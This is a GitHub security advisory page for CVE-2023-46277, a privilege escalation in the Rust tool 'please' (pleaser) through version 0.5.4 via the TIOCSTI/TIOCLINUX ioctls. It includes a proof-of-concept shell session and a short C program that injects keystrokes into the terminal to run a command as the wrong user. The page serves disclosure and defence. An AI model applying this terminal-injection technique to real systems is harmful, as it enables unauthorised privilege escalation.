GHSA-cgf8-h3fp-h956
Suggest an improvement- Source
- https://github.com/advisories/GHSA-cgf8-h3fp-h956
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-cgf8-h3fp-h956/GHSA-cgf8-h3fp-h956.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-cgf8-h3fp-h956
- Aliases
- Published
- 2023-10-20T06:30:19Z
- Modified
- 2024-09-12T18:41:42Z
- Severity
-
- 7.8 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- 8.5 (High) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- Pleaser privilege escalation vulnerability
- Details
-
please (aka pleaser) through 0.5.4 allows privilege escalation through the TIOCSTI and/or TIOCLINUX ioctl. (If both TIOCSTI and TIOCLINUX are disabled, this cannot be exploited.)
Here is how to see it in action:
$ cd "$(mktemp -d)" $ git clone --depth 1 https://gitlab.com/edneville/please.git $ cd please/ $ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9 $ cargo test && cargo build --release $ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini $ sudo chown root:root ./target/release/please $ sudo chmod u+s ./target/release/please $ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c #include <sys/ioctl.h> int main(void) { const char *text = "id\n"; while (*text) ioctl(0, TIOCSTI, text++); return 0; } TIOCSTI_C_EOF $ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c $ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobodyPlease note that:
This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
- Database specific
{ "nvd_published_at": "2023-10-20T05:15:08Z", "cwe_ids": [ "CWE-269" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2023-10-20T22:37:41Z" }- References
-
- https://nvd.nist.gov/vuln/detail/CVE-2023-46277
- https://github.com/rustsec/advisory-db/pull/1798
- https://gitlab.com/edneville/please
- https://gitlab.com/edneville/please/-/issues/13
- https://gitlab.com/edneville/please/-/merge_requests/69#note_1594254575
- https://rustsec.org/advisories/RUSTSEC-2023-0066.html
Affected packages
crates.io / pleaser
Package
- Name
- pleaser
- View open source insights on deps.dev
- Purl
- pkg:cargo/pleaser